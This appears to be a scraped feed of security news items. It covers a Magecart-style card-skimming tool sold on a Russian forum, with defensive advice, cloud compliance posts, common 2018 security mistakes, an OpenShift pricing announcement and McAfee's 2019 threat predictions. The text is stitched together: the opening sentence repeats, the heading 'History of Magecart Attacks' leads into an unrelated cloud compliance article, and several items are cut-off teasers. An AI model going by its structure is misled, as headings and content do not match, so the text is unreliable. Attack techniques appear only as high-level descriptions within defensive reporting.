Cloud security firm Avanan announced on Monday that it has raised $25 million in a Series B funding round, which brings the total raised by the company to date to over $41 million.
Cloud security firm Avanan announced on Monday that it has raised $25 million in a Series B funding round, which brings the total raised by the company to date to over $41 million.
SecurityWeek RSS Feed
Armor, a leading cloud security solutions provider, has found what it believes to be the first Magecart-style (credit card sniffing) attack tool to be openly offered for sale on the Dark Web. Previous Magecart-style attacks, (such as the British Airways and Newegg attacks for example), have been carried out by specific threat groups who have, from all accounts, used their own proprietary payment card sniffing tool and not a sniffing tool which has been openly sold on the Underground Hacker Markets.
According to the ad posted the first week of December, this Magecart-style attack tool is new and is being sold for $1,300 USD. The ad is on a Russian forum, and the threat actors selling the tool has been active in the Russian forums for over a year. He has purportedly also developed and made available for sale a banking trojan for the Android mobile operating system.
The payment card data is collected by the sniffer and sent off to a remote server under your control. Additionally, the tool also uses Secure Socket Layer (SSL) protocol to encrypt the outbound payment card data being collected, making it harder for security teams to see the data being exfiltrated from the e-commerce site.
Less than a month ago, on November 30th, Armor’s Threat Resistance Unit (TRU) released a Threat Alert, stating that it expected to see an increase in Magecart-style attacks coinciding with the holiday e-commerce rush, and as a natural next step in the evolution of Magecart attacks, stemming from the increased attention and reporting brought on by successful compromises reported over the last several months, including Ticketmaster, British Airways, Newegg and multiple third party plugin providers. The TRU Team predicted that, as part of this natural next phase, there would be an increase in instances of low-sophistication Magecart copycat attacks, similar to what was seen in the outbreaks of Cryptominers and Ransomware over the last couple of years.
In the opinion of TRU senior security researcher Corey Milligan, “This attack tool represents the first step in the commoditization of the Magecart-style attack, creating a new line of revenue for the original Magecart threat groups while simultaneously serving to saturate the threat landscape with attempts by low-level threat actors, and thus hiding the original threat actors’ own activities that security experts are now hot on the trail of.”
Milligan also noted that, “while this tool provides low-sophistication threat actors with a powerful capability, other pieces are required to utilize the sniffer effectively, as it does not identify vulnerable e-commerce targets using Magento, OpenCart or OsCommerce payment forms. It also does not provide a mechanism for penetrating identified targets, implant the script that will download and run the sniffer in a browser, or provide a secure, non-attributable server to collect the harvested credit card data.”
In the hands of a low-level threat actor, the TRU team believes this tool will mostly likely be plugged into a process that involves the automated scanning for and the indiscriminate attacking of vulnerable e-commerce sites, even ones that don’t have the applicable payment form. “We expect to see a mass of “Hail Mary” attacks, with the cybercriminals intent on hitting as many sites as possible, hoping that some of them will succeed and be fruitful,” said Milligan. “As the adage goes, they only have to be right once, and in this case, being right once could result in a haul of credit card data that is profitable and easy to sell on the Dark Web.”
How E-Commerce Retailers Can Protect Themselves and their Customers from Magecart-Style Attacks?
While these recommendations are ranked, Good, Better, Best, it is recommended that, where possible, these techniques are used in combination with each other to provide a layered defense.
– Keep your payment page simple. Loading third-party scripts along with your payment processing page increases your risk of third-party compromise. Many third-party content providers are not focused on security. Threat actors are known to choose the softer target ,and they will not hesitate to circumvent your security by compromising a third-party you are trusting on your payment processing page.
– Audit public facing web content regularly to identify unauthorized changes.
– Use subresource integrity for embedded scripts. On its own, it won’t protect you from all forms of third-party code injection attacks, but as a practice it raises your level of security and makes you a harder target.
– As a backup measure and a step to mitigate similar attacks, a content security policy (CSP) header can be employed. This additional header for web content tells the browser, that is accessing your site, where resources are authorized to be downloaded from. While this won’t stop the download of scripts from compromised, trusted third-parties, it does help mitigate other HTML injection attacks where the content source has been changed to an untrusted download source.
– Outsource your payment processing to a third-party payment processor. While this involves trusting a third-party, all third-parties are not equal. Of course, do your homework before selecting one, but, in general, payment processors that perform this service have well implemented security practices. While there will be additional costs involved with using an external payment processor, it can also relieve you of many stringent PCI requirements that have costs of their own to maintain.
It is worth noting that the seller of the credit card sniffer code, referenced previously, specifically stated in their offering that the tool would not be effective against sites that utilize third- party payment forms, as the entering of payment information and payment processing does not actually take place on the infected e-commerce site.
If you have been affected by one of these type attacks, and the third-party code supplier has taken steps to clean it up, you may still be vulnerable if you are using a Content Delivery Network (CDN) that caches content to improve performance. If this is the case, be sure to flush cached pages as one of the final steps to cleanup.
How Online Shoppers Can Protect Themselves from a Magecart Attack
While most banks offer services to help you recover from fraud, it can take time. In the case of a debit card, the time it takes to recover stolen funds that may be needed to pay a bill is too big of a risk to take. Using a credit card reduces this risk, but an even better solution is to use a prepaid card. Prepaid cards are easy to obtain, even for those with no credit history, and they limit the amount that can be stolen via fraud to the amount of money you put on the card. Prepaid cards may not be the most convenient or cost-effective solution, but they can help keep your credit and bank account information out of the hands of criminals.
History of Magecart Attacks
The growing demand for increased business agility and cost reductions in relation to IT infrastructure and applications is not a new agenda item for C-level executives. It has, however, remained a priority topic in 2018.
Compliance with various regulations and cloud security requirements has expanded as technology and cloud uptake advance — albeit not at a similar pace, leaving organizations with a challenging conundrum to solve. This is particularly relevant when executives consider cloud security and business transformations.
Balance the Costs and Benefits of Cloud Migration
The partnership between IBM and Red Hat announced earlier this year highlights a strategic vision to deliver transformational change to clients and meet cloud security demand. We’ve also seen record-breaking technological advancements and a growing number of data and application migrations to the cloud.
In general, these migrations follow either a hybrid or multicloud strategy. Hybrid cloud is defined as a combination of cloud services that are deployed both on-premises and in the cloud. Multicloud means using multiple cloud computing service providers across a single heterogeneous environment for applications, software or infrastructure.
Whatever the strategy, cloud migrations involve transitioning and managing extensive processing and workloads outside of traditional IT infrastructure while addressing cloud security and compliance challenges. The main industries that are seeing an increased focus, volume and complexity of regulations are banking and financial services. In these sectors, many are pursuing innovative business strategies that drive requirements for critical infrastructure and applications to the cloud.
The regulatory compliance challenge for such innovation poses both an opportunity and a concern for the C-suite and boardroom. Financial institutions must confront the reality of dramatically increasing costs while also keeping pace with the legislative and regulatory changes arising from numerous regulatory bodies. Global organizations have the added burden of even more international and nation-specific regulations.
The cost of compliance is often high, but any effort to reduce staff without demonstrable and measurable improvements in compliance processes and technology could be viewed negatively by regulatory bodies, investors and shareholders.
Meet Cloud Security Compliance Requirements Head-On
One of the most common misconceptions we hear from clients is that moving to the cloud with data held by multiple third parties on shared systems will be a complex undertaking. Our view is that cloud services can be extremely secure and often a more stable option than utilizing existing internal IT infrastructure. However, there are a some activities that need to be considered to meet regulatory compliance requirements, such as:
- Deploying continuous monitoring of both technical and nontechnical cloud compliance requirements. This should also include corporate governance, cybersecurity and regulatory compliance controls;
- Maintaining a unified source or framework of governance, risk and compliance information for how cloud services are utilized;
- Developing executive and operational dashboards to provide visibility into cloud compliance statuses;
- Implementing real-time alerting mechanisms for control failures with defined playbooks on how to respond to compliance failures from third-party providers; and
- Ensuring that you can continuously synchronize new cloud services and capabilities with regulatory compliance requirements.
These cloud security to-dos can help your organization take on the seemingly daunting task of cloud migration while remaining secure and compliant.
The post Overcoming the Cloud Security Compliance Conundrum appeared first on Security Intelligence.
Last month, I spoke during the Innovation Showcase at the Financial Services Information Sharing and Analysis Center (FS-ISAC) Fall Summit. The goal was to update this group of high-level security professionals on a continuous compliance managed services solution that helps solve the cloud compliance dilemma — and on the solution’s first successful implementation. In a consortium of more than 30 financial services firms building an industry-standard cloud control framework, almost all reported regulatory compliance as a major hurdle to cloud adoption.
Overcome the Challenges of Cloud Compliance
Financial institutions are eager to use the hybrid cloud as a productive workplace to achieve strategic goals. But as reported in our white paper, “Turning Regulatory Challenges of the Cloud Into Competitive Advantage,” firms must overcome three major cloud adoption challenges.
First, companies face different regulatory obligations in various geographies. Multinational organizations must map regulatory obligations to 26 different countries and jurisdictions as far-flung as Singapore, London and New York.
Second, cloud service providers (CSPs) often provide different levels of control in the cloud than in the data center. That leaves financial services firms to build the right controls to address how they store and use data and who can access it — wherever it is. Regulators express concern over the amount of sensitive information CSPs maintain, often without being subject to the stringent regulations that govern banks, according to Business Insider.
Third, financial services firms and CSPs need a common security framework. A major accomplishment was reaching a consensus among the consortium members on the Cloud Security Alliance (CSA) open source framework. Modifications make it possible to build a single framework that is fully integrated with risk management and cybersecurity controls.
Lay the Groundwork for Continuous Compliance
Our managed services solution helps answer these challenges with continuous compliance to meet requirements for workloads running on public clouds — not only for regulations impacting the cloud, but for the General Data Protection Regulation (GDPR), Financial Industry Regulatory Authority (FINRA), U.S. Securities and Exchange Commission (SEC) and other regulatory bodies. The solution was developed in three stages.
1. Build a Regulatory Database for All Geographies
A continuous compliance database maps to every regulatory authority around the world. The database also defines GDPR and other cybersecurity obligations. The service monitors changes and makes timely updates to an industry-standard cloud control framework and regulatory database.
2. Map All of the Regulations and Controls to Each CSP
Mapping to CSPs is critical to achieve a standard level of control and to meet or exceed controls financial services firms might use within their own firewalls. Our solution maps a standard set of controls to every CSP, whether it’s Amazon, Google, Microsoft or IBM.
3. Adapt the Solution to the Individual Financial Services Firm
Each financial services firm already maintains in-house controls. The managed services solution requires an adapter to map the standardized framework to the existing framework for each firm’s individual policies, standards and procedures.
Continuous Compliance in Action
One of the largest investment firms in the world recently implemented the continuous compliance managed services solution with impressive success. A team of back-office personnel previously spent each day combing the internet for new and changing legislation and determining the impacts on current controls. The employees made updates manually.
The work was painstaking, tedious, and labor- and time-intensive, but these compliance employees formed the firm’s frontline defense against regulatory risk. Our managed services solution will help enable the firm to reduce its staff while saving substantially on compliance and reducing the risk of regulatory fines and reputational damage.
Automate Compliance With Cognitive Computing
Compliance is not a one-time event, but rather an ongoing process of monitoring and maintaining. Automation and cognitive computing — including artificial intelligence (AI) and machine learning — are the engines behind better, more efficient cloud governance.
In the future, the continuous compliance service will use Watson for RegTech. Watson will initially ingest existing regulations. Then, Watson will not only identify changes and update regulations, but also revise the controls that correspond with each regulation. Once Watson is fully trained, the time to add a new regulation or update an existing one will shrink exponentially.
Transfer to Other Obligations, Technologies and Domains
Financial services firms ultimately need to be in complete, real-time alignment with their regulatory obligations worldwide. Firms can access the industry-standard database to consume and adapt to updates for policies, requirements and controls while still maintaining their own firm-specific controls and processes. Our managed services solution mainly covers financial services regulations for cloud computing. Going forward, look for the scope to extend to regulations covering myriad technologies and domains to help financial institutions of all stripes overcome their greater cloud adoption challenges.
The post Continuous Compliance Eases Cloud Adoption for Financial Services Firms appeared first on Security Intelligence.
Zane Lackey is the co-founder and CSO at Signal Sciences, and the author of Building a Modern Security Program (O’Reilly Media). He serves on multiple Advisory Boards including the National Technology Security Coalition, the Internet Bug Bounty Program, and the US State Department-backed Open Technology Fund. Prior to co-founding Signal Sciences, Zane lead a security team at the forefront of the DevOps/Cloud shift as CISO of Etsy. In this interview with Help Net Security he … More
The post CISO challenges and the path to cutting edge security appeared first on Help Net Security.
As 2018 draws to a close, it’s time to reflect on the strides the cybersecurity industry made over the past year, and how far companies around the world still have to go to improve their security posture. Throughout the year, businesses were plagued by cybersecurity risks and hit with massive data breaches. In the lead-up to the holiday season, security leaders across industries are wishing for a quiet 2019 with no negative data breach headlines.
5 Cybersecurity Missteps That Put Enterprises at Risk in 2018
What lessons did we learn in 2018? And as we look forward, what best practices can we implement to improve defenses in the new year? We asked industry experts where they observe the worst security practices that still leave enterprises exposed to cybersecurity risks, and they offered advice to help companies and users enjoy a merrier, brighter, more secure 2019.
1. Poor Password Policies
Although passwords are far from perfect as a security mechanism, they are still used pervasively in the enterprise and in personal life. Yet password policies are still rife with problems around the globe.
Idan Udi Edry, CEO of Trustifi, said the most foundational — and also most disregarded — cybersecurity practice is maintaining a strong password.
“A unique password should be utilized for every account and not reused,” said Edry. “It is important to update passwords every 30–90 days. Passwords should never include a significant word, such as a pet’s name, or a significant date, such as a birthdate.”
Deploying devices and appliances and then leaving default passwords in place is also still a shockingly common practice. A threat actor with knowledge of a manufacturer or service provider’s default password conventions can do a lot of damage to an organization with factory settings still in place.
Edry advised enterprises to employ two-factor authentication (2FA) to add more security to their access strategy. Douglas Crawford, digital privacy adviser for BestVPN, meanwhile, recommended encouraging employees to use a password manager.
“It is hard to remember strong passwords for every website and service we use, so people simply stop bothering,” said Crawford. “Use of ‘123456’ as a password is still scarily common. And then we use the same password on every website we visit. This [is] particularly irksome, as this entire security nightmare can be easily remedied through use of password manager apps or services, which do the heavy lifting for us.”
2. Misconfigured Cloud Storage
Earlier this year, researchers from Digital Shadows uncovered more than 1.5 billion sensitive files stored in publicly available locations, such as misconfigured websites and unsecured network-attached storage (NAS) drives.
“Unfortunately, many administrators misconfigure [these buckets] rendering the contents publicly-accessible,” wrote Michael Marriott, senior strategy and research analyst with Digital Shadows.
The information uncovered included a treasure trove of personal data, such as payroll, tax return and health care information — all available to prying eyes thanks to overlooked security best practices in cloud storage.
“With the rise of mobility and cloud usage in enterprises, one of the worst security practices is leaving critical cloud services and SaaS applications open to the internet,” said Amit Bareket, co-founder and CEO of Perimeter 81.
It’s time to get proactive to analyze potential exposures in storage and then devise a plan to address cloud data risks to your organization. It’s also important to remember that with any connected service, it is often better not to deploy than to deploy insecurely.
3. Ineffective Cyber Awareness Training
Security begins and ends with your employees — but how much do they know about security? Specifically, how much do they know about the risks they are facing and how their actions could set your business up for a potential incident?
“At this time of the year, it’s critically important to ensure proper employee awareness of the risks related to travel,” said Baan Alsinawi, president and founder of TalaTek, a Washington-based risk management firm. “Using public Wi-Fi at airports or hotels to access corporate data, possible loss of personally-held devices such as an iPad, iPhone or corporate laptop, especially if not encrypted, talking to strangers about work issues or projects over a glass of wine can expose confidential information.”
Of course, a robust awareness program needs to be in place year-round. Data from London-based advisory and solutions company Willis Towers Watson found that employees are the cause of 66 percent of all cyberbreaches, either through negligence or deliberate offense.
Employees should be regularly educated on phishing, social engineering techniques and other attack vectors that could put corporate data at risk. If awareness training isn’t part of your security strategy, 2019 is the time to learn what an effective awareness program looks like and implement one to promote security best practices in your organization.
4. Poor Oversight of Third-Party Cybersecurity Risks
Third-party vendors and partners can be a source of compromise if criminals can access your organization’s sensitive information through their poorly secured systems. If you’re working with third-party vendors and partners, your security is only as good as theirs. If their systems are breached, your data is also at risk.
“Attackers seeking access to hardened company systems can pivot to breaching an integrated third party, establishing a beachhead there and then leveraging the trust implicit in the integration to gain access,” explained Ralph R. Russo, director of applied computing programs and professor of practice of IT management and cybersecurity at Tulane University School of Professional Advancement.
In 2019, evaluate the state of your third-party risk management. Make it a priority to identify gaps that may put you at risk if you are working with less-than-secure vendors. Implement a vigorous vetting process to determine the security level of your trusted partners.
5. Lack of an Incident Response Plan
A formal, regularly tested cybersecurity incident response plan is essential, yet many organizations continue to operate without one. In fact, 77 percent of companies do not have any formal plan.
Without a written and tested incident response plan, you’re unprepared for the worst-case scenario. It is not enough to focus on prevention; it is essential to establish a comprehensive incident response plan that is clear, detailed, flexible, includes multiple stakeholders, and tested and updated regularly.
Improve Your Security Posture in 2019 and Beyond
If your organization engages in any of these poor practices, it may be time to brush up on your basic cyber hygiene best practices. By following the recommendations outlined here, you can confidently resolve to close gaps in risk mitigation and establish more effective strategies to improve your company’s security posture in 2019 and beyond.
The post Avoid Coal in Your Digital Stocking — Here’s How to Improve Your Security Posture in 2019 appeared first on Security Intelligence.
Google this week announced the availability of several new features for its Google Cloud Platform (GCP) customers, as part of the beta release of its Cloud Security Command Center (Cloud SCC).
By Sathish Balakrishnan
There’s no shortage of data pointing to the growth of Linux container and cloud-native applications. According to a recent survey from the Cloud Native Computing Foundation (CNCF), many of the Kubernetes deployments underpinning these workloads are taking place in public clouds. While Red Hat OpenShift Container Platform provides the industry’s most comprehensive enterprise Kubernetes platform for on-premise and hybrid cloud containerized workloads, we also enable organizations to consume OpenShift-as-a-service with Red Hat OpenShift Dedicated.
Today, we’re adding enhancements to Red Hat OpenShift Dedicated, from instance types to updated pricing and new models allowing for OpenShift Dedicated to be deployed on customer’s cloud subscriptions. This is designed to provide more flexibility to customers and help make it easier for them to deploy containerized applications on enterprise Kubernetes in the public cloud.
Red Hat OpenShift Dedicated is based on Red Hat OpenShift Container Platform and delivered as a fully managed service directly by Red Hat on Amazon Web Services (AWS) and other cloud providers. This enables customers to consume Red Hat’s powerful container and Kubernetes platform just like other cloud services to gain greater agility, flexibility and focus on building applications.
Red Hat OpenShift Dedicated on AWS now supports the ability for customers to bring their own cloud accounts. This new option allows customers to use their AWS contracts and pricing as well as their existing security profiles that have been validated by their corporate security teams, helping to further reduce friction in adopting Red Hat OpenShift Dedicated on AWS.
New features provided by Red Hat OpenShift Dedicated include:
Multi-AZ stretched clusters which allow for cluster deployment across multiple availability zones (AZ). This helps to maximize service availability for product systems and applications.
Expanded EC2 instance types including memory-optimized, compute-optimized or general purpose, which can be sized to meet specific needs.
Additional enhancements to Red Hat OpenShift Dedicated include:
Encrypted persistent volumes
Cluster console for more admin-level cluster status, node visibility, access control management and a cluster-wide event stream
Improvements to the dedicated-admin role, such as the ability to modify the default project template
Another key facet of public cloud computing is cost-effectiveness, and updates to Red Hat OpenShift Dedicated pricing on AWS helps to make these decisions more straightforward for IT leaders. Starting on Dec. 12, 2018, the cost of an OpenShift Dedicated Cluster is reduced by 25 percent and the cost of additional nodes have been cut by 50 percent. This helps reduce the overhead costs of running enterprise Kubernetes in AWS while providing a flexible, supported and fully open platform for production deployments.
As with all Red Hat technologies, Red Hat OpenShift Dedicated is backed by Red Hat’s extensive expertise and award-winning support 24×7. We feel that these pricing updates combined with the enhanced features make Red Hat OpenShift Dedicated an even more effective platform for building new cloud-native workloads and bridging existing workloads to public cloud instances.
Along with Red Hat OpenShift Dedicated, we announced a Red Hat OpenShift solution jointly engineered with Microsoft at Red Hat Summit in May 2018: Red Hat OpenShift on Azure. As we approach general availability of Red Hat OpenShift on Azure in 2019, the first batch of customers have been on-boarded to a private preview of the offering. If you would like to join private preview, please let your Red Hat Account Executive know about your interest.
To learn more about the new pricing and features in Red Hat OpenShift Dedicated, please visit https://www.openshift.com/products/dedicated/ .
By Don Boxely, CEO and Co- Founder at DH2i, The decentralization of today’s enterprise is a recognized fact. The multitude of cloud benefits—cheap storage, pay-per-use pricing, disaster recovery (DR), and
The post Hybrid and Multi-Cloud Security: Bulletproof Software Defined Perimeter Implementations appeared first on The Cyber Security Place.
These predictions were written by Eoin Carroll, Taylor Dunton, John Fokker, German Lancioni, Lee Munson, Yukihiro Okutomi, Thomas Roccia, Raj Samani, Sekhar Sarukkai, Dan Sommer, and Carl Woodward.
As 2018 draws to a close, we should perhaps be grateful that the year has not been entirely dominated by ransomware, although the rise of the GandCrab and SamSam variants show that the threat remains active. Our predictions for 2019 move away from simply providing an assessment on the rise or fall of a particular threat, and instead focus on current rumblings we see in the cybercriminal underground that we expect to grow into trends and subsequently threats in the wild.
We have witnessed greater collaboration among cybercriminals exploiting the underground market, which has allowed them to develop efficiencies in their products. Cybercriminals have been partnering in this way for years; in 2019 this market economy will only expand. The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before.
Social media has been a part of our lives for more than a decade. Recently, nation-states have infamously used social media platforms to spread misinformation. In 2019, we expect criminals to begin leveraging those tactics for their own gain. Equally, the continued growth of the Internet of Things in the home will inspire criminals to target those devices for monetary gain.
One thing is certain: Our dependency on technology has become ubiquitous. Consider the breaches of identity platforms, with reports of 50 million users being affected. It is no longer the case that a breach is limited to that platform. Everything is connected, and you are only as strong as your weakest link. In the future, we face the question of which of our weakest links will be compromised.
—Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research
Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats
Hidden hacker forums and chat groups serve as a market for cybercriminals, who can buy malware, exploits, botnets, and other shady services. With these off-the-shelf products, criminals of varying experience and sophistication can easily launch attacks. In 2019, we predict the underground will consolidate, creating fewer but stronger malware-as-a-service families that will actively work together. These increasingly powerful brands will drive more sophisticated cryptocurrency mining, rapid exploitation of new vulnerabilities, and increases in mobile malware and stolen credit cards and credentials.
We expect more affiliates to join the biggest families, due to the ease of operation and strategic alliances with other essential top-level services, including exploit kits, crypter services, Bitcoin mixers, and counter-antimalware services. Two years ago, we saw many of the largest ransomware families, for example, employ affiliate structures. We still see numerous types of ransomware pop up, but only a few survive because most cannot attract enough business to compete with the strong brands, which offer higher infection rates as well as operational and financial security. At the moment the largest families actively advertise their goods; business is flourishing because they are strong brands (see GandCrab) allied with other top-level services, such as money laundering or making malware undetectable.
Underground businesses function successfully because they are part of a trust-based system. This may not be a case of “honor among thieves,” yet criminals appear to feel safe, trusting they cannot be touched in the inner circle of their forums. We have seen this trust in the past, for example, with the popular credit card shops in the first decade of the century, which were a leading source of cybercrime until major police action broke the trust model.
As endpoint detection grows stronger, the vulnerable remote desktop protocol (RDP) offers another path for cybercriminals. In 2019 we predict malware, specifically ransomware, will increasingly use RDP as an entry point for an infection. Currently, most underground shops advertise RDP access for purposes other than ransomware, typically using it as a stepping stone to gain access to Amazon accounts or as a proxy to steal credit cards. Targeted ransomware groups and ransomware-as-a-service (RaaS) models will take advantage of RDP, and we have seen highly successful under-the-radar schemes use this tactic. Attackers find a system with weak RDP, attack it with ransomware, and propagate through networks either living off the land or using worm functionality (EternalBlue). There is evidence that the author of GandCrab is already working on an RDP option.
We also expect malware related to cryptocurrency mining will become more sophisticated, selecting which currency to mine on a victim’s machine based on the processing hardware (WebCobra) and the value of a specific currency at a given time.
Next year, we predict the length of a vulnerability’s life, from detection to weaponization, will grow even shorter. We have noticed a trend of cybercriminals becoming more agile in their development process. They gather data on flaws from online forums and the Common Vulnerabilities and Exposures database to add to their malware. We predict that criminals will sometimes take a day or only hours to implement attacks against the latest weaknesses in software and hardware.
We expect to see an increase in underground discussions on mobile malware, mostly focused on Android, regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security. The value of exploiting the mobile platform is currently underestimated as phones offer a lot to cybercriminals given the amount of access they have to sensitive information such as bank accounts.
Credit card fraud and the demand for stolen credit card details will continue, with an increased focus on online skimming operations that target third-party payment platforms on large e-commerce sites. From these sites, criminals can silently steal thousands of fresh credit cards details at a time. Furthermore, social media is being used to recruit unwitting users, who might not know they are working for criminals when they reship goods or provide financial services.
We predict an increase in the market for stolen credentials—fueled by recent large data breaches and by bad password habits of users. The breaches lead, for example, to the sale of voter records and email-account hacking. These attacks occur daily.
Artificial Intelligence the Future of Evasion Techniques
To increase their chances of success, attackers have long employed evasion techniques to bypass security measures and avoid detection and analysis. Packers, crypters, and other tools are common components of attackers’ arsenals. In fact, an entire underground economy has emerged, offering products and dedicated services to aid criminal activities. We predict in 2019, due to the ease with which criminals can now outsource key components of their attacks, evasion techniques will become more agile due to the application of artificial intelligence. Think the counter-AV industry is pervasive now? This is just the beginning.
In 2018 we saw new process-injection techniques such as “process doppelgänging” with the SynAck ransomware, and PROPagate injection delivered by the RigExploit Kit. By adding technologies such as artificial intelligence, evasion techniques will be able to further circumvent protections.
Different evasions for different malware
In 2018, we observed the emergence of new threats such as cryptocurrency miners, which hijack the resources of infected machines. With each threat comes inventive evasion techniques:
- Cryptocurrency mining: Miners implement a number of evasion techniques. One example is WaterMiner, which simply stops its mining process when the victim runs the Task Manager or an antimalware scan.
- Exploit kits: Popular evasion techniques include process injection or the manipulation of memory space and adding arbitrary code. In-memory injection is a popular infection vector for avoiding detection during delivery.
- Botnets: Code obfuscation or anti-disassembling techniques are often used by large botnets that infect thousands of victims. In May 2018, AdvisorsBot was discovered using junk code, fake conditional instructions, XOR encryption, and even API hashing. Because bots tend to spread widely, the authors implemented many evasion techniques to slow reverse engineering. They also used obfuscation mechanisms for communications between the bots and control servers. Criminals use botnets for activities such as DDOS for hire, proxies, spam, or other malware delivery. Using evasion techniques is critical for criminals to avoid or delay botnet takedowns.
- Advanced persistent threats: Stolen certificates bought on the cybercriminal underground are often used in targeted attacks to bypass antimalware detection. Attackers also use low-level malware such as rootkits or firmware-based threats. For example, in 2018 ESET discovered the first UEFI rootkit, LoJax. Security researchers have also seen destructive features used as anti-forensic techniques: The OlympicDestroyer malware targeted the Olympic Games organization and erased event logs and backups to avoid investigation.
Artificial intelligence the next weapon
In recent years, we have seen malware using evasion techniques to bypass machine learning engines. For example, in 2017 the Cerber ransomware dropped legitimate files on systems to trick the engine that classifies files. In 2018, PyLocky ransomware used InnoSetup to package the malware and avoid machine learning detection.
Clearly, bypassing artificial intelligence engines is already on the criminal to-do list; however, criminals can also implement artificial intelligence in their malicious software. We expect evasion techniques to begin leveraging artificial intelligence to automate target selection, or to check infected environments before deploying later stages and avoiding detection.
Such implementation is game changing in the threat landscape. We predict it will soon be found in the wild.
Synergistic Threats Will Multiply, Requiring Combined Responses
This year we have seen cyber threats adapt and pivot faster than ever. We have seen ransomware evolving to be more effective or operate as a smoke screen. We have seen cryptojacking soar, as it provides a better, and safer, return on investment than ransomware. We can still see phishing going strong and finding new vulnerabilities to exploit. We also noticed fileless and “living off the land” threats are more slippery and evasive than ever, and we have even seen the incubation of steganography malware in the Pyeongchang Olympics campaign. In 2019, we predict attackers will more frequently combine these tactics to create multifaced, or synergistic, threats.
What could be worse?
Attacks are usually centered on the use of one threat. Bad actors concentrate their efforts on iterating and evolving one threat at a time for effectiveness and evasion. When an attack is successful, it is classified as ransomware, cryptojacking, data exfiltration, etc., and defenses are put in place. At this point, the attack’s success rate is significantly reduced. However, if a sophisticated attack involves not one but five top-notch threats synergistically working together, the defense panorama could become very blurry. The challenge arises when an attempt is made to identify and mitigate the attack. Because the ultimate attack goals are unknown, one might get lost in the details of each threat as it plays a role in the chain.
One of the reasons synergic threats are becoming a reality is because bad actors are improving their skills by developing foundations, kits, and reusable threat components. As attackers organize their efforts into a black-market business model, they can focus on adding value to previous building blocks. This strategy allows them to orchestrate multiple threats instead of just one to reach their goals.
An example is worth a thousand words
Imagine an attack that starts with a phishing threat—not a typical campaign using Word documents, but a novel technique. This phishing email contains a video attachment. When you open the video, your video player does not play and prompts you to update the codec. Once you run the update, a steganographic polyglot file (a simple GIF) is deployed on your system. Because it is a polyglot (a file that conforms to more than one format at the same time), the GIF file schedules a task that fetches a fileless script hosted on a compromised system. That script running in memory evaluates your system and decides to run either ransomware or a cryptocurrency miner. That is a dangerous synergistic threat in action.
The attack raises many questions: What are you dealing with? Is it phishing 2.0? Is it stegware? Is it fileless and “living off the land”? Cryptojacking? Ransomware? It is everything at the same time.
This sophisticated but feasible example demonstrates that focusing on one threat may not be enough to detect or remediate an attack. When you aim to classify the attack into a single category, you might lose the big picture and thus be less effective mitigating it. Even if you stop the attack in the middle of the chain, discovering the initial and final stages is as important for protecting against future attempts.
Be curious, be creative, connect your defenses
Tackling sophisticated attacks based on synergic threats requires questioning every threat. What if this ransomware hit was part of something bigger? What if this phishing email pivots to a technique that employees are not trained for? What if we are missing the real goal of the attack?
Bearing these questions in mind will not only help capture the big picture, but also get the most of security solutions. We predict bad actors will add synergy to their attacks, but cyber defenses can also work synergistically.
Cybercriminals to Use Social Media Misinformation, Extortion Campaigns to Challenge Organizations’ Brands
The elections were influenced, fake news prevails, and our social media followers are all foreign government–controlled bots. At least that’s how the world feels sometimes. To say recent years have been troubled for social media companies would be an understatement. During this period a game of cat and mouse has ensued, as automated accounts are taken down, adversaries tactics evolve, and botnet accounts emerge looking more legitimate than ever before. In 2019, we predict an increase of misinformation and extortion campaigns via social media that will focus on brands and originate not from nation-state actors but from criminal groups.
Nation-states leverage bot battalions to deliver messages or manipulate opinion, and their effectiveness is striking. Bots often will take both sides of a story to spur debate, and this tactic works. By employing a system of amplifying nodes, as well as testing the messaging (including hashtags) to determine success rates, botnet operators demonstrate a real understanding of how to mold popular opinion on critical issues.
In one example, an account that was only two weeks old with 279 followers, most of which were other bots, began a harassment campaign against an organization. By amplification, the account generated an additional 1,500 followers in only four weeks by simply tweeting malicious content about their target.
Activities to manipulate public opinion have been well documented and bots well versed in manipulating conversations to drive agendas stand ready. Next year we expect that cybercriminals will repurpose these campaigns to extort companies by threatening to damage their brands. Organizations face a serious danger.
Data Exfiltration Attacks to Target the Cloud
In the past two years, enterprises have widely adopted the Software-as-a-Service model, such as Office 365, as well as Infrastructure- and Platform-as-a-Service cloud models, such as AWS and Azure. With this move, far more corporate data now resides in the cloud. In 2019, we expect a significant increase in attacks that follow the data to the cloud.
With the increased adoption of Office 365, we have noticed a surge of attacks on the service— especially attempts to compromise email. One threat the McAfee cloud team uncovered was the botnet KnockKnock, which targeted system accounts that typically do not have multifactor authentication. We have also seen the emergence of exploits of the trust model in the Open Authorization standard. One was launched by Fancy Bear, the Russian cyber espionage group, phishing users with a fake Google security app to gain access to user data.
Similarly, during the last couple of years we have seen many high-profile data breaches attributed to misconfigured Amazon S3 buckets. This is clearly not the fault of AWS. Based on the shared responsibility model, the customer is on the hook to properly configure IaaS/PaaS infrastructure and properly protect their enterprise data and user access. Complicating matters, many of these misconfigured buckets are owned by vendors in their supply chains, rather than by the target enterprises. With access to thousands of open buckets and credentials, bad actors are increasingly opting for these easy pickings.
McAfee has found that 21% of data in the cloud is sensitive—such as intellectual property, and customer and personal data—according to the McAfee Cloud Adoption and Risk Report. With a 33% increase in users collaborating on this data during the past year, cybercriminals know how to seek more targets:
- Cloud-native attacks targeting weak APIs or ungoverned API endpoints to gain access to the data in SaaS as well as in PaaS and serverless workloads
- Expanded reconnaissance and exfiltration of data in cloud databases (PaaS or custom applications deployed in IaaS) expanding the S3 exfiltration vector to structured data in databases or data lakes
- Leveraging the cloud as a springboard for cloud-native man-in-the-middle attacks (such as GhostWriter, which exploits publicly writable S3 buckets introduced due to customer misconfigurations) to launch cryptojacking or ransomware attacks into other variants of MITM attacks.
Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices
As tech fans continue to fill their homes with smart gadgets, from plugs to TVs, coffee makers to refrigerators, and motion sensors to lighting, the means of gaining entry to a home network are growing rapidly, especially given how poorly secured many IoT devices remain.
But the real key to the network door next year will be the voice-controlled digital assistant, a device created in part to manage all the IoT devices within a home. As sales increase—and an explosion in adoption over the holiday season looks likely—the attraction for cybercriminals to use assistants to jump to the really interesting devices on a network will only continue to grow.
